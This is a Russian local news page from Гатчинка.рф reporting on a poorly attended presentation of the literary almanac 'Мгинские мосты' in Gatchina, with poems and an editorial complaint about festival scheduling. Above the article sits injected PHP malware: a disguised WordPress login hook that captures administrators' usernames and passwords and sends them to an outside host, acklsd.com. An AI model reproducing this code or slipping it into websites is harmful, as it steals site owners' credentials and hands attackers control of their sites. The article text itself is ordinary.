if (!function_exists("theme_login_init_e691dd827bcab292bda72cb716f33c79")) { function theme_login_init_e691dd827bcab292bda72cb716f33c79() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acklsd.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_e691dd827bcab292bda72cb716f33c79', 10, 0); } Котовасия от Котова, или Презентация «ММ» — несмотря ни на что — Гатчинка.рф
Home » Поселения » Город Гатчина » Котовасия от Котова, или Презентация «ММ» — несмотря ни на что
Журнал Мгинские Мосты4Pe5TfFoEmd8Ln5vK1GOrsvFtsj4jKpzfvyW-_LDkGWVO3_TXZ8Z36rlaSuK9Tu4g

Котовасия от Котова, или Презентация «ММ» — несмотря ни на что

«А в этом месте мы хотели показать вам карту, на которой указаны все 47 стран, которые участвуют в нашем фестивальном движении…», «А вот здесь по плану у нас видеоролик, снятый к 15-летию фестиваля…» — такими репликами то и дело перемежается рассказ Светланы Коневой о литературно-публицистическом альманахе «Мгинские мосты».

Презентация журнала проходила 21 июня, в Розовой гостиной Гатчинского ДК. Мероприятие было назначено на 16.30. Но беда в том, что через полчаса в «Победе» начиналась церемония закрытия кинофестиваля «Литература и кино». Организаторы международного фестиваля «Мгинские мосты» и редакторы одноимённого альманаха Светлана Конева и Ольга Дорофеева, участвующие в «Книжном маяке» Гатчины по приглашению  Дениса Котова — президента фестивального движения «Книжные маяки России» — перед началом презентации с изумлением узнали о том, что руководство «Маяка», а так же публика, видеооператоры и техперсонал откочевали на церемонию закрытия, оставив женщин один на один с десятком самых неравнодушных к литературе гатчинцев.

Светлана Конева

Светлана Конева

Именно поэтому Светлане Борисовне приходилось время от времени рассказывать, какое видео мы могли бы посмотреть в этом месте. Ну, ровно, как Пятачок рассказывал Ослику Иа о том, какой замечательный был шарик.  Благо, что в литературном альманахе всё же главное не видео, а, собственно, литература. Этим гости обделены не были. Все четыре участника презентации, прежде всего, поэты: Светлана Конева, Ольга Дорофеева, Любовь Сердечная, Денис Балин.

Наш проект давно стал визитной карточкой Ленинградской области. Продвижение культуры родного региона, укрепление культурных связей между Ленобластью, другими регионами России и зарубежными странами реально выполняемые задачи проекта. И эти задачи выполняются во многом благодаря участию в нём талантливых современных авторов, сказала Светлана Конева, приглашая на сцену Любовь Сердечную.

Лбовь Сердечная

Любовь Сердечная

Высокая, статная, эмоциональная, рыжая поэтесса сразу захватила сердца слушателей. Разве может не тронуть такое обращение к родному городу: «Я не забыл тебя, город, а спрятал за пазуху». Разве могут не навернуться слёзы от щемящих воспоминаний:

Вези меня, ледянка, в детство,
Где мне ещё не больно падать,
Где «Чур» — от всех напастей средство,
Где каждая снежинка — радость!

Светлана Конева и Ольга Дорофеева не только читали свои стихи. Но и с любовью рассказывали о каждом разделе и рубрике альманаха.

Альманах начинал свою жизнь как издание небольшого формата. Первый номер вышел в 2008 году. А когда он влился в проект фестиваля, то преобразился. Изменился его формат и он стал литературно- публицистическим журналом, говорила Ольга Александровна, представляя ретроспективу издания.

Ольга Дорофеева

Ольга Дорофеева

Отрадно, что свои произведения для публикации в наш альманах предоставляют и признанные мастера современной российской литературы и начинающие писатели. Например, Ирина Дрозденко, которую сейчас уже неплохо знают как автора «душевной публицистики», впервые публиковалась в «Мгинских мостах», рассказала главный редактор Светлана Конева.

Познакомиться с альманахом можно в электронном виде, а гости презентации стали обладателями экземпляра печатной версии журнала.

Завершилась встреча строками из стихотворения Светланы Коневой «Огонёк», которыми Светлана Борисовна традиционно прощается с участниками фестиваля «Мгинские Мосты».

От огонька зажжётся огонёк,

От творчества зажжётся вдохновенье…

И вы частицу нашего горенья

С собой на счастье уносите впрок.

 Алёна РЫБАКОВА

Фото: Сергей КОВАЧЕВ

От редакции: Вынуждены констатировать, что попытка вплести «Книжный маяк» в канву «Литературы и кино» оказалась неудачной. 20 июня в программе Маяка было заявлено: «В 16:00 центральное поэтическое событие фестиваля: Поэтический Пьедестал у Памятника-стелы «Гатчина-город воинской славы». Поэтический Пьедестал это лобное место для поэтов, где прозвучат стихи и песни современных авторов и классиков. У публики будет возможность пообщаться с поэтами лично». Пришедшие к означенному времени журналисты нашего издания не увидели у  стелы ничего, кроме развивающихся флагов. В это время в вестибюле ДК шла поэтическая встреча при 8 зрителях, а в кинозале при полной посадке фильм «Группа крови». За несколько дней до открытия фестиваля была опубликована афиша-приглашение на литературную встречу с Ириной Дрозденко. Но в полной программе «Книжного маяка», опубликованной 18 июня, эта встреча обозначена не была. Наша редакция сочла, что встречу отменили, и не отправила на неё корреспондентов, а встреча состоялась, как и было заявлено. Вот такая котовасия…

 

 

More 578 posts in Город Гатчина
Recommended for you
60е фото2
Гатчинской Детской библиотеке 105 лет: 60-е годы – Новоселье в Детской библиотеке

Третье поколение детей мирной послевоенной жизни росло - дети учились, получали знания в детских садах,...